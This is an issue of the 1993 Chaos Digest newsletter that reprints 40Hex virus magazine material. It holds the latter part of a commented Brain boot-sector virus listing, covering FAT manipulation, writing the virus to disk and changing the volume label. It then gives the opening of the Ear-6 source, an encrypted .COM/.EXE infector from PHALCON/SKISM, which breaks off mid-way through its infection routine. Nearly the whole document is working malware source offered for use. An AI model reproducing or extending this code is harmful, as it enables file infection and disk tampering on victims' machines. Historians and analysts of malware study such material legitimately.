Chaos Digest Samedi 3 Juillet 1993 Volume 1 : Numero 70

Chaos Digest Samedi 3 Juillet 1993 Volume 1 : Numero 70
ISSN 1244-4901

Editeur: Jean-Bernard Condat ([email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.70 (3 Juillet 1993)
File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
[email protected]
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: [email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint)

FATManip: ;returns al as error code
jmp short delvedeeper
nop
FATManipreadcounter dw 3
db ' (c) 1986 Brain & Amjads (pvt) Ltd'
delvedeeper:
call readFAT ;Get FAT ID byte
mov ax,word ptr ds:[offset readbuffer]
cmp ax,0FFFDh ;is it 360K disk?
je is360Kdisk ;continue if so
mov al,3 ;al=3 == not good disk
stc ;flag error
retn ;and exit
is360Kdisk:
mov cx,37h
mov FATManipreadcounter,0 ;none found yet
checknextsector:
call FATentry12bit ;get entry in FAT
cmp ax,0 ;unused?
jne notunused
inc FATManipreadcounter ;one more found unused
cmp FATManipreadcounter,3 ;If need more,
jne tryanother ; go there
jmp short markembad ;found 3 consecutive
nop ;empty sectors
notunused:
mov FATManipreadcounter,0 ;must start over
tryanother:
inc cx ;try next sector
cmp cx,163h ;end of disk?
jne checknextsector ;if not, continue
mov al,1 ;al=1 == none empty
stc ;Indicate error
retn
markembad:
mov dl,3 ;3 times
markanotherbad:
call markbad12bit
dec cx
dec dl
jnz markanotherbad
inc cx
call calc1sttrack
call writeFAT ;update FAT
mov al,0 ;al=0 == ok
clc ;indicate success
retn

markbad12bit:
push cx
push dx
mov si,offset readbuffer ;si -> buffer
mov al,cl
shr al,1
jc low_12 ;low bits
call clus2offset12bit
mov ax,[bx+si] ;get FAT entry
and ax,0F000h ;mark it bad
or ax,0FF7h
jmp short putitback ;and put it back
nop
low_12:
call clus2offset12bit
mov ax,[bx+si] ;get FAT entry
and ax,0Fh ;mark it bad
or ax,0FF70h
putitback:
mov [bx+si],ax ;replace FAT entry
mov word ptr ds:[400h][bx+si],ax ;in two places
pop dx
pop cx
retn

FATentry12bit:
push cx
mov si,offset readbuffer ;si->buffer
mov al,cl
shr al,1
;Part 3 of the virus starts here
jc want_high_12
call clus2offset12bit
mov ax,[bx+si]
and ax,0FFFh
jmp short exitFATentry12bit
nop
want_high_12:
call clus2offset12bit ;xxxxxxxxxxxx0000
mov ax,[bx+si] ;^^^^^^^^^^^^wanted
and ax,0FFF0h ;mask wanted bits
mov cl,4 ;and move to correct
shr ax,cl ;position
exitFATentry12bit:
pop cx
retn

clus2offset12bit:
push dx
mov ax,3
mul cx
shr ax,1 ;ax = cx*1.5
mov bx,ax
pop dx
retn

readFAT:
mov ah,2 ;read
call FAT_IO
retn

writeFAT:
mov ah,3 ;write
call FAT_IO
retn

FAT_IO:
mov cx,4 ;try four times
FAT_IOLoop:
push cx
push ax
mov ah,0 ;reset disk
int 6Dh ;int 13h
pop ax
jc tryFAT_IOagain
mov bx,offset readbuffer
mov al,4 ;4 sectors
mov dh,0 ;head 0
mov dl,curdrive
mov cx,2 ;sector 2
push ax ;(FAT)
int 6Dh ;int 13h
pop ax
jnc exitFAT_IO
tryFAT_IOagain:
pop cx
loop FAT_IOLoop

pop ax
pop ax
mov al,2
stc ;mark error
retn
exitFAT_IO:
pop cx
retn

calc1sttrack:
push cx
sub cx,2
shl cx,1 ;2 sectors/cluster
add cx,0Ch ;start of data area
mov ax,cx ;ax = sector
mov cl,12h ;4096
div cl ;ax/4096 = al rem ah
mov byte ptr firstsector+1,al
mov firsthead,0
inc ah
cmp ah,9 ;past track 9?
jbe notpasttrack9 ;nope, we are ok
sub ah,9 ;otherwise, adjust
mov firsthead,1
notpasttrack9:
mov byte ptr firstsector,ah
pop cx
retn

db 0, 0, 0, 0, 0, 0
r_or_w_root db 3
entrycount dw 35h

tempsave1 dw 303h
tempsave2 dw 0EBEh
tempsave3 dw 1
tempsave4 dw 100h
db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh
db 8Dh, 98h, 9Fh, 8Eh,0E0h
db ' (c) ashar $'
changeroot:
call readroot ;read in root directory
jc donotchangeroot
push di
call changevolume ;change volume label
pop di
jc donotchangeroot
call writeroot ;write back new root dir
donotchangeroot:
retn
;The following is just garbage bytes
db 0BBh, 9Bh, 04h,0B9h, 0Bh
db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h
db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h
db 0C6h, 06h

changevolume:
mov entrycount,6Ch
mov si,offset readbuffer+40h;3nd dir entry
mov tempsave1,dx
mov ax,entrycount ;6Ch
shr ax,1
mov tempsave3,ax ;36h
shr ax,1
mov tempsave2,ax ;1Bh
xchg ax,cx
and cl,43h ;cx = 3
mov di,tempsave2
add di,1E3h ;di = 01FE
findlabel:
mov al,[si]
cmp al,0
je dolabel ;no mo entries
mov al,[si+0Bh] ;attribute byte
and al,8 ;volume label?
cmp al,8 ;yes?
je dolabel ;then change it!
add si,20h ;go to next directory entry
dec entrycount
jnz findlabel ;loop back
stc ;Error!
retn
db 8Bh
dolabel:
mov bx,[di] ;offset a_data
xor bx,tempsave3 ;bx = 53Ah
mov tempsave3,si ;si->direntry
cli
mov ax,ss
mov tempsave1,ax
mov tempsave2,sp
mov ax,cs
mov ss,ax
mov sp,tempsave3
add sp,0Ch ;->reserved area
mov cl,51h
add dx,444Ch
mov di,2555h
mov cx,0C03h
repe cmpsw
mov ax,0B46h
mov cx,3
rol ax,cl ;ax = 5A30h
mov tempsave3,ax
mov cx,5
mov dx,8
sub tempsave3,5210h ;820h
push tempsave3 ;store attributes/reserved
;I haven't commented the remainder of this procedure.
;It basically changes the volume label to read "(c) Brain"

;Comment mode OFF

dowhatever:
mov ah,[bx] ;5a3h
inc bx
mov dl,ah
shl dl,1
jc dowhatever
searchstuff:
mov dl,[bx] ;dl=C2h
inc bx ;bx=53Eh
mov al,dl
shl dl,1
jc searchstuff
add ax,1D1Dh
push ax
inc tempsave3
db 73h, 01h ;jnc $+3
db 0EAh,0E2h,0E1h, 8Bh, 26h;jmp 268B:E1E2
xchg bp,ax
add al,0A1h
xchg bx,ax
add al,8Eh
sar bl,1
add dh,[bp+si]
clc
ret
;db 95h, 04h,0A1h, 93h, 04h, 8Eh
;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h

;Comment mode ON

readroot:
mov r_or_w_root,2 ;set action code
jmp short do_rw_root ;easier to do w/
nop ;mov ah, 2
writeroot:
mov r_or_w_root,3
jmp short do_rw_root ;this is somewhat useless
nop
do_rw_root:
mov dh,0 ;head 0
mov dl,curdrive
mov cx,6 ;sector 6
mov ah,r_or_w_root
mov al,4 ;4 sectors
mov bx,offset readbuffer
call doint13h
jc exit_rw_root ;quit on error
mov cx,1
mov dh,1 ;head 1
mov ah,r_or_w_root
mov al,3
add bx,800h
call doint13h

exit_rw_root:
retn

doint13h:
mov tempsave1,ax
mov tempsave2,bx
mov tempsave3,cx
mov tempsave4,dx
mov cx,4

doint13hloop:
push cx
mov ah,0 ;Reset disk
int 6Dh
jc errordoingint13h
mov ax,tempsave1
mov bx,tempsave2
mov cx,tempsave3
mov dx,tempsave4
int 6Dh ;int 13h
jnc int13hsuccess
errordoingint13h:
pop cx
loop doint13hloop

stc ;indicate error
retn
int13hsuccess:
pop cx
retn

db 0, 0, 0
;Part 4 of the virus starts here
tempstorecx dw 3
readwritecurrentdata dw 301h

writevirus:
call FATManip
jc exitwritevirus
mov cursector,1
mov curhead,0
mov bx,offset readbuffer
call readcurrent
mov bx,offset readbuffer
mov ax,firstsector
mov cursector,ax
mov ah,firsthead
mov curhead,ah
call writecurrent
call calcnextsector
mov cx,5
mov bx,200h
writeanothersector:
mov tempstorecx,cx
call writecurrent
call calcnextsector
add bx,200h
mov cx,tempstorecx
loop writeanothersector

mov curhead,0
mov cursector,1
mov bx,0
call writecurrent
clc ;indicate success
exitwritevirus:
retn

readcurrent:
mov readwritecurrentdata,201h
jmp short doreadwrite
nop
writecurrent:
mov readwritecurrentdata,301h
jmp short doreadwrite ;This is pointless.
nop
doreadwrite:
push bx
mov cx,4

tryreadwriteagain:
push cx
mov dh,curhead
mov dl,curdrive
mov cx,cursector
mov ax,readwritecurrentdata ;read or write?
int 6Dh ;int 13h
jnc readwritesuccessful
mov ah,0 ;reset disk
int 6Dh ;int 13h
pop cx
loop tryreadwriteagain

pop bx
pop bx
stc ;Indicate error
retn
readwritesuccessful:
pop cx
pop bx
retn

calcnextsector:
inc byte ptr cursector ;next sector
cmp byte ptr cursector,0Ah
jne donecalculate ;finished calculations
mov byte ptr cursector,1 ;clear sector #
inc curhead ;and go to next head
cmp curhead,2 ;if not too large,
jne donecalculate ;we are done
mov curhead,0 ;otherwise clear head #
inc byte ptr cursector+1 ;and advance cylinder
donecalculate:
retn

db 64h, 74h, 61h

;read buffer starts here
;insert your favorite boot block below...
readbuffer:
brain ends
end

+++++

40Hex Number 8 Volume 2 Issue 4 File 009

-=PHALCON/SKISM=- Ear-6 Virus

The Ear-6 is a parasitic, non-resident, .COM & .EXE infector. It
infects 5 files everytime it is run. It will traverse towards the root
directory if fewer than 5 files are found. We have no clue as to what
the 'AUX error' that Patti talks about. But then again, Patti isn't
sure as to who she is, let alone an accurate discription on one of our
virii. On activation (1st of any month), it plays ear quiz with
victim. Failure to answer the question will result in program
termination.
-) Gheap

---------------------------------------------------------------------------
;[Ear-6]

;El virus de oreja y oido seis
;Fue escrito por Dark Angel de PHALCON/SKISM
;Yo (el angel oscuro) escribi este programa hace muchas semanas.
;No deba modificar este programa y da a otras personas COMO SI
;estara el suyo.

;?Donde esta mi llama, mama?

; diccionarito
;espanol ingles magnitud size
;abre open mango handle
;aprueba pass (a test) mascara mask
;atras back mensaje message
;azado random mes month
;busca find monton heap
;cierra close oreja, oido ear
;cifra code, encrypt, decrypt pila stack
;codo pointer pregunta question
;corto terse, short primer first
;empieza begin remendar patch
;escriba write renuncia reject
;espanol ingles respuesta answer
;fecha date salta exit
;ficha file siguiente following, next
;indice table suspende fail (a test)
;?le gusta? do you like? termina end
;longitud length virus virus (!)

model tiny
code
org 100h

longitud_del_virus = TerminaVir - EmpezarVir
longitud_del_escribir = offset termina_escribir - offset escribir

id = 'GH' ;Representa el lider de
;PHALCON/SKISM, Garbageheap
Empezar: db 0e9h, 0, 0 ;jmp EmpezarVir

EmpezarVir:
shwing:
remendar1:
mov bx, offset EmpezarCifra
remendar2:
mov cx, ((longitud_del_virus + 1) / 2)
hacia_atras: ;atras
db 2eh
remendar3:
db 81h, 37h, 0, 0 ;xor word ptr cs:[bx], 0
add bx, 2
loop hacia_atras
EmpezarCifra:

call siguiente ;Es estupido, pero es corto
siguiente:
pop bp
sub bp, offset siguiente

mov byte ptr [bp+numinf], 0

cld ;No es necessario, pero
;?por que no?
cmp sp, id
jz SoyEXE
SoyCOM: mov di, 100h
push di
lea si, [bp+Primer3]
movsb
jmp short SoyNada
SoyEXE: push ds
push es
push cs
push cs
pop ds
pop es

lea di, [bp+EXE_Donde_JMP] ;el CS:IP original de la ficha
lea si, [bp+EXE_Donde_JMP2] ;infectada
movsw
movsw
movsw

jmp short SoyNada

NombreDelVirus db 0,'[Ear-6]',0 ;En ingles, !por supuesto!
NombreDelAutor db 'Dark Angel',0

SoyNada:
movsw

mov ah, 1ah ;Esindicece un DTA nuevo
lea dx, [bp+offset nuevoDTA] ;porque no quiere destruir
int 21h ;el DTA original

mov ax, word ptr [bp+remendar1+1]
mov word ptr [bp+tempo], ax

mov ah, 47h ;Obtiene el directorio
xor dl, dl ;presente
lea si, [bp+diroriginal]
int 21h

looper:
lea dx, [bp+offset mascara1] ;"mascara", no "mascara"
call infectar_mascara ;pero no es possible usar
;acentos en MASM/TASM.
;!Que lastima!
;mascara1 es '*.EXE',0
lea dx, [bp+offset mascara2] ;mascara2 es '*.COM',0
call infectar_mascara ;infecta las fichas de COM

cmp byte ptr [bp+numinf], 5 ;?Ha infectada cinco fichas?
jg saltar ;Si es verdad, no necesita
;busca mas fichas.
mov ah, 3bh ;Cambia el directorio al
lea dx, [bp+puntos] ;directorio anterior
int 21h ;('..', 'punto punto')
jnc looper

saltar: lea dx, [bp+backslash] ;Cambia el directorio al
mov ah, 3bh ;directorio terminado.
int 21h

mov ah, 2ah ;Activa el primer de
int 21h ;cada mes
cmp dl, 1 ;Si no es el primer,
jnz saltarahora ;!saltar ahora! (duh-o)

mov ah, 2ch ;?Que hora es?
int 21h

cmp dl, 85 ;85% probabilidad de
jg saltarahora ;activacion

and dx, 7 ;Un numero quasi-azado
shl dl, 1 ;Usalo para determinar
mov bx, bp ;que preguntara la virus
add bx, dx
mov dx, word ptr [bx+indice] ;indice para el examencito
add dx, bp
inc dx
push dx ;Salva el codo al pregunta

mov ah, 9 ;Escriba el primer parte de
lea dx, [bp+mensaje] ;la pregunta
int 21h

pop dx ;Escriba el parte de la oreja
int 21h ;o el oido
dec dx
push dx ;Salva la respuesta correcta

lea dx, [bp+secciones] ;Escriba los secciones de la
int 21h ;oreja y el oido

trataotrarespuesta:
mov ah, 7 ;Obtiene la respuesta de la
int 21h ;"victima"
cmp al, '1' ;Necesita una respuesta de
jl trataotrarespuesta ;uno hasta tres
cmp al, '3' ;Renuncia otras respuestas
jg trataotrarespuesta

int 29h ;Escriba la respuesta

pop bx ;El codo al respuesta
;correcta
mov ah, 9 ;Prepara a escribir un
;mensaje
cmp al, byte ptr [bx] ;?Es correcta?
jz saltarapidamente ;El aprueba el examencito.
;Pues, salta rapidamente.
lea dx, [bp+suspendido] ;Lo siento, pero !Ud. no
int 21h ;aprueba el examencito facil!

mov ah, 4ch ;Estudie mas y el programa
jmp quite ;permitira a Ud a continuar.

saltarapidamente:
lea dx, [bp+aprueba]
int 21h
saltarahora:
mov ah, 1ah ;Restaura el DTA original
mov dx, 80h
quite:
cmp sp, id - 4 ;?Es EXE o COM?
jz vuelvaEXE
vuelvaCOM:
int 21h ;Restaura el DTA y vuelva
retn ;a la ficha original de COM

vuelvaEXE:
pop es
pop ds ;ds -> PSP

int 21h

mov ax, es
add ax, 10h ;Ajusta para el PSP
add word ptr cs:[bp+EXE_Donde_JMP+2], ax
cli
add ax, word ptr cs:[bp+PilaOriginal+2]
mov ss, ax
mov sp, word ptr cs:[bp+PilaOriginal]
sti
db 0eah ;JMP FAR PTR SEG:OFF
EXE_Donde_JMP dd 0
PilaOriginal dd 0

EXE_Donde_JMP2 dd 0
PilaOriginal2 dd 0

infectar_mascara:
mov ah, 4eh ;Busca la ficha primera
mov cx, 7 ;Cada atributo
brb_brb:
int 21h
jc hasta_la_vista_bebe ;No la busca

xor al, al
call abrir ;Abre la ficha

mov ah, 3fh
mov cx, 1ah
lea dx, [bp+buffer]
int 21h

mov ah, 3eh ;Cierra la ficha
int 21h

lea si,[bp+nuevoDTA+15h] ;Salva cosas sobre la ficha
lea di,[bp+f_atrib] ;Por ejemplo, la fecha de
mov cx, 9 ;creacion
rep movsb

------------------------------

End of Chaos Digest #1.70
************************************